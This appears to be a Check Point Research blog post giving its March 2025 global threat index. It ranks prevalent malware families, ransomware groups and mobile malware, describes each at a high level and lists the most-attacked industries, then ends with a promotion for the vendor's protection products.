Our latest Global Threat Index for March 2025 shows the continued dominance of FakeUpdates, a downloader malware that remains the most prevalent cyber threat worldwide. This sustained threat comes as RansomHub ransomware campaigns gain traction, marking a growing concern in the ransomware space. Meanwhile, education remains the most impacted industry globally, with both malware and ransomware attacks increasingly targeting this sector.

This month, researchers uncovered a new intrusion campaign delivering FakeUpdates, the most prevalent malware, and leading to RansomHub ransomware attacks. FakeUpdates continues to be the most prevalent malware, with a notable trend in March where the attack chain involves compromised websites, rogue Keitaro TDS instances, and fake browser update lures to trick users into downloading FakeUpdates malware. The obfuscated JavaScript loader enables data exfiltration, command execution, and persistent access for further exploitation. These findings underscore the evolving tactics cyber criminals employ, with legitimate platforms such as Dropbox and TryCloudflare being increasingly exploited to evade detection and maintain persistence.

Meanwhile, researchers uncovered a massive Lumma Stealer phishing campaign, compromising over 1,150 organizations and 7,000 users across North America, Southern Europe, and Asia. Attackers distributed nearly 5,000 malicious PDFs hosted on Webflow’s CDN, using fake CAPTCHA images to trigger PowerShell execution and deploy malware. This growing trend of exploiting legitimate platforms to distribute malware reflects a shift in cyber criminal tactics aimed at evading detection. Additionally, researchers linked Lumma Stealer to fake Roblox games and a trojanized pirated Windows Total Commander tool promoted via hijacked YouTube accounts.

Top malware families

*The arrows relate to the change in rank compared to the previous month.

FakeUpdates is the most prevalent malware this month with an impact of 8% worldwide organizations, followed by Remcos and AgenTesla both with an impact of 3%.

  1. FakeUpdates – Fakeupdates (AKA SocGholish) is a downloader malware that was initially discovered in 2018. It is spread through drive-by downloads on compromised or malicious websites, prompting users to install a fake browser update. Fakeupdates malware is associated with a Russian hacking group Evil Corp and used to deliver various secondary payloads after the initial infection.
  2. Remcos – Remcos is a Remote Access Trojan (RAT) first observed in 2016, often distributed through malicious documents in phishing campaigns. It is designed to bypass Windows security mechanisms, such as UAC, and execute malware with elevated privileges, making it a versatile tool for threat actors.
  3. AgentTesla – AgentTesla is an advanced RAT (remote access Trojan) that functions as a keylogger and password stealer. Active since 2014, AgentTesla can monitor and collect the victim’s keyboard input and system clipboard, and can record screenshots and exfiltrate credentials entered for a variety of software installed on the victim’s machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook email client). AgentTesla is openly sold as a legitimate RAT with customers paying $15 – $69 for user licenses.
  4. AsyncRat – AsyncRAT is a remote access Trojan (RAT) targeting Windows systems, first identified in 2019. It exfiltrates system information to a command-and-control server and executes commands such as downloading plugins, terminating processes, capturing screenshots, and updating itself. Commonly distributed via phishing campaigns, it is used for data theft and system compromise.
  5. Androxgh0st – AndroxGh0st is a Python-based malware that targets applications using the Laravel PHP framework by scanning for exposed .env files containing sensitive information such as login credentials for services like AWS, Twilio, Office 365, and SendGrid. It operates by utilizing a botnet to identify websites running Laravel and extracting confidential data. Once access is gained, attackers can deploy additional malware, establish backdoor connections, and exploit cloud resources for activities like cryptocurrency mining.
  6. Formbook – Formbook, first identified in 2016, is an infostealer malware that primarily targets Windows systems. The malware harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute additional payloads. The malware spreads via phishing campaigns, malicious email attachments, and compromised websites, often disguised as legitimate files.
  7. Phorpiex – Phorpiex, also known as Trik, is a botnet that has been active since at least 2010, primarily targeting Windows systems. At its peak, Phorpiex controlled more than a million infected hosts. Phorpiex is notorious for distributing other malware families, including ransomware and cryptominers, via spam campaigns, and has been involved in large-scale sextortion campaigns.
  8. Lumma – Lumma Stealer, first detected in August 2022, is a malware-as-a-service (MaaS) information stealer that exfiltrates sensitive data from infected Windows systems, including credentials, cryptocurrency wallets, and browser information. It spreads through phishing campaigns, malicious websites, and social engineering tactics like the ClickFix method, where users are tricked into executing attacker-provided PowerShell commands.
  9. Rilide – Rilide is a malicious browser extension targeting Chromium-based browsers like Chrome, Edge, Brave, and Opera. Disguised as a legitimate Google Drive extension, it enables threat actors to monitor browsing history, take screenshots, and inject malicious scripts to withdraw funds from cryptocurrency exchanges. Notably, Rilide can simulate dialogs to trick users into disclosing two-factor authentication (2FA) details, facilitating unauthorized cryptocurrency transactions. Its distribution methods include malicious Microsoft Publisher files and deceptive Google Ads promoting fake software installers.
  10. Mirai – Mirai is a malware strain that transforms networked devices running Linux, particularly Internet of Things (IoT) devices like IP cameras and home routers, into remotely controlled bots forming a botnet. First identified in August 2016, Mirai gained notoriety for orchestrating some of the largest distributed denial-of-service (DDoS) attacks recorded, including those against the website of security journalist Brian Krebs and the DNS provider Dyn. The malware propagates by scanning the internet for IoT devices still configured with default factory login credentials, exploiting these to gain control. Following the public release of its source code in October 2016, numerous variants have emerged.
Top Ransomware Groups

The data is based on insights from ransomware “shame sites”. RansomHub is the most prevalent ransomware group this month, responsible for 12% of the published attacks, followed by Qilin and Akira, both with impact of 6%.

  1. RansomHub – RansomHub is a ransomware-as-a-service (RaaS) operation that emerged as a rebranded version of the previously known Knight ransomware. Surfacing prominently in early 2024 in underground cyber crime forums, RansomHub has quickly gained notoriety for its aggressive campaigns targeting various systems including Windows, macOS, Linux, and particularly VMware ESXi environments. This malware is known for employing sophisticated encryption methods.
  2. Qilin – Qilin, also referred to as Agenda, is a ransomware-as-a-service criminal operation that collaborates with affiliates to encrypt and exfiltrate data from compromised organizations, subsequently demanding a ransom. This ransomware variant was first detected in July 2022 and is developed in Golang. Agenda is known for targeting large enterprises and high-value organizations, with a particular focus on the healthcare and education sectors. Qilin typically infiltrates victims via phishing emails containing malicious links to establish access to their networks and exfiltrate sensitive information. Once inside, Qilin usually moves laterally through the victim’s infrastructure, seeking critical data to encrypt.
  3. Akira – Akira Ransomware, first reported in the beginning of 2023, targets both Windows and Linux systems. It uses symmetric encryption with CryptGenRandom() and Chacha 2008 for file encryption and is similar to the leaked Conti v2 ransomware. Akira is distributed through various means, including infected email attachments and exploits in VPN endpoints. Upon infection, it encrypts data and appends a “.akira” extension to file names, then presents a ransom note demanding payment for decryption.
Top Mobile Malwares

This month Anubis in the 1st place in the most prevalent mobile malware, followed by Necro and AhMyth.

  1. ↔ Anubis – Anubis is a versatile banking trojan that originated on Android devices and has evolved to include advanced capabilities such as bypassing multi-factor authentication (MFA) by intercepting SMS-based one-time passwords (OTPs), keylogging, audio recording, and ransomware functions. It is often distributed through malicious apps on the Google Play Store and has become one of the most prevalent mobile malware families. Additionally, Anubis includes remote access trojan (RAT) features, enabling extensive surveillance and control over infected systems.
  2. ↔ Necro – Necro is a malicious Android downloader that retrieves and executes harmful components on infected devices based on commands from its creators. It has been discovered in several popular apps on Google Play, as well as modified versions of apps on unofficial platforms like Spotify, WhatsApp, and Minecraft. Necro is capable of downloading dangerous modules to smartphones, enabling actions such as displaying and clicking on invisible ads, downloading executable files, and installing third-party apps. It can also open hidden windows to run JavaScript, potentially subscribing users to unwanted paid services. Furthermore, Necro can reroute internet traffic through compromised devices, turning them into part of a proxy botnet for cyber criminals.
  3. ↔ AhMyth – AhMyth is a remote access trojan (RAT) targeting Android devices, typically disguised as legitimate apps like screen recorders, games, or cryptocurrency tools. Once installed, it gains extensive permissions to persist after reboot and exfiltrate sensitive information such as banking credentials, cryptocurrency wallet details, multi-factor authentication (MFA) codes, and passwords. AhMyth also enables keylogging, screen capture, camera and microphone access, and SMS interception, making it a versatile tool for data theft and other malicious activities.
Top-Attacked Industries Globally

This month education is the most attacked industry globally, followed by telecommunications and government.

  1. Education
  2. Telecommunications
  3. Government
Threat Index per country

The map below displays the risk index globally (darker red- higher risk), demonstrating the main risk areas around the world.

Check Point’s Global Threat Impact Index and its ThreatCloud Map are powered by Check Point’s Threat Cloud AI intelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors worldwide over networks, endpoints, and mobiles. The intelligence is enriched with AI-based engines and exclusive research data from Check Point Research, the intelligence and research arm of Check Point.

Conclusion

Check Point’s Threat Emulation and Harmony Endpoint offer robust protection against a wide range of attack methods, file types, and operating systems, including the malware families and attack types discussed in this blog. Threat Emulation analyzes files to detect malicious activity before they can infiltrate a user’s network, effectively revealing unknown threats and zero-day vulnerabilities. When used alongside Harmony Endpoint, which conducts real-time file analysis, Threat Emulation evaluates each file, allowing users to quickly access a secure version while the original file undergoes a thorough examination. This proactive approach not only enhances security by providing rapid access to safe content but also systematically identifies and addresses potential threats, thereby preserving the network’s integrity.

You may also like